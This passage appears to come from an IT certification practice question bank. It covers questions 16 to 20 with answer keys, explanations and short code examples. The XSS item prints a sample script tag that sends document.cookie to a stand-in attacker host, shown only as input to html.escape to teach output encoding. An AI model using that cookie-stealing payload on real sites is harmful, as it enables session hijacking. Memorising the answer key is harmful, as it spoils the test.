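As one illustration of the control IaaS offers, the sketch below uses the AWS SDK for Python (boto3) to launch a virtual machine; the AMI ID, region, and instance type are placeholders, and everything from the operating system upward remains the customer's responsibility to configure, secure, and patch:

import boto3   # third-party AWS SDK: pip install boto3

ec2 = boto3.client("ec2", region_name="us-east-1")
response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",   # placeholder machine image
    InstanceType="t3.micro",
    MinCount=1,
    MaxCount=1,
)
print(response["Instances"][0]["InstanceId"])   # ID of the newly provisioned VM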
Question 16
Which Windows command-line tool is used to check disk integrity and repair file system errors?
A) chkdsk
B) sfc
C) diskpart
D) ping
Answer: A
Explanation:
The chkdsk (Check Disk) command analyzes a hard drive for file system errors, bad sectors, and inconsistencies, offering the ability to repair them automatically. Option B, sfc, verifies and restores protected system files. Option C, diskpart, manages disk partitions. Option D, ping, checks network connectivity. Chkdsk is essential for maintaining system stability, preventing data loss, and addressing corruption caused by improper shutdowns, software crashes, or hardware failures. Advanced parameters allow repair of physical sectors and detailed logging for troubleshooting. IT technicians use chkdsk during maintenance and recovery operations to ensure data integrity and prolong disk lifespan.
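Typical invocations from an elevated Command Prompt include the following; /f and /r may require scheduling the scan for the next reboot if the volume is in use:

chkdsk C:        (read-only scan that reports problems without changing anything)
chkdsk C: /f     (fixes file system errors that are found)
chkdsk C: /r     (implies /f and also locates bad sectors, recovering readable data)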
Question 17
Which type of attack involves inserting malicious code into a website that executes in a victim’s browser?
A) SQL Injection
B) Cross-Site Scripting (XSS)
C) Man-in-the-Middle
D) Phishing
Answer: B
Explanation:
Cross-Site Scripting (XSS) attacks inject malicious scripts into websites, which execute in the victim’s browser to steal information, hijack sessions, or perform unauthorized actions. Option A, SQL Injection, targets database queries. Option C, Man-in-the-Middle, intercepts communication between users and systems. Option D, Phishing, tricks users into providing sensitive information. XSS attacks exploit vulnerabilities in web applications, emphasizing the need for input validation, content security policies, and user education. Understanding XSS and implementing protective coding practices is critical for developers and security professionals to prevent client-side exploitation.
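Output encoding is one of the core defenses. In Python, for example, the standard library's html.escape converts the characters a browser would treat as markup into harmless entities, so an injected script tag renders as text instead of executing; web frameworks' template engines typically apply this kind of escaping automatically:

import html

user_input = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
safe_output = html.escape(user_input)
print(safe_output)   # &lt;script&gt;... is displayed as literal text rather than run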
Question 18
Which type of network cable is most commonly used for Ethernet connections in modern wired LANs?
A) Coaxial
B) Fiber Optic
C) Twisted Pair (Cat5e/Cat6)
D) HDMI
Answer: C
Explanation:
Twisted pair cables, such as Cat5e and Cat6, are standard for Ethernet connections in modern LANs due to their cost-effectiveness, reliability, and performance capabilities. Option A, Coaxial, is largely outdated for networking. Option B, Fiber Optic, is used for long-distance or high-speed backbone connections. Option D, HDMI, is for audiovisual signals, not networking. Twisted pair cables are widely used for desktops, servers, switches, and routers, supporting speeds up to 10 Gbps in Cat6a configurations. Proper cabling, termination, and shielding are essential to minimize interference and maintain data integrity. Network administrators must select appropriate cable types based on speed, distance, and environmental factors for optimal network performance.
Question 19
Which authentication method involves using a device that generates one-time codes to log in?
A) Biometric
B) Hardware Token
C) Password
D) Smart Card
Answer: B
Explanation:
Hardware tokens generate time-based or challenge-response one-time passwords (OTPs) to authenticate users, providing an extra security layer against unauthorized access. Option A, Biometric, relies on physical traits. Option C, Password, uses static credentials. Option D, Smart Card, contains embedded chips for secure authentication but may not generate dynamic codes. Hardware tokens are widely used in multi-factor authentication (MFA) systems, particularly in financial institutions and enterprise environments, enhancing security against credential theft. Understanding token mechanisms, lifecycle, and integration into access control systems is crucial for IT security professionals to implement robust authentication frameworks.
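Most such tokens implement the TOTP algorithm (RFC 6238), which the token and the server compute independently from a shared secret and the current time. A minimal Python sketch, using a well-known example Base32 secret, looks like this:

import base64, hashlib, hmac, struct, time

def totp(secret_b32, digits=6, period=30):
    # HMAC-SHA1 over the current 30-second time step, truncated to a short numeric code.
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // period
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))   # server and token derive the same 6-digit code each period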
Question 20
Which Windows feature provides a centralized interface to view and manage all connected hardware devices?
A) Device Manager
B) Task Manager
C) Event Viewer
D) Control Panel
Answer: A
Explanation:
Device Manager offers a centralized interface in Windows for viewing, updating, disabling, and troubleshooting hardware components. Option B, Task Manager, monitors system performance and running processes. Option C, Event Viewer, tracks system and application logs. Option D, Control Panel, provides access to various system settings but is less focused on hardware management. Device Manager is essential for IT technicians diagnosing driver issues, hardware conflicts, or connectivity problems. It provides detailed information about installed devices, resource allocation, and driver versions. Efficient use of Device Manager improves system stability, performance, and reliability, and is foundational knowledge for troubleshooting hardware-related issues in both enterprise and home computing environments.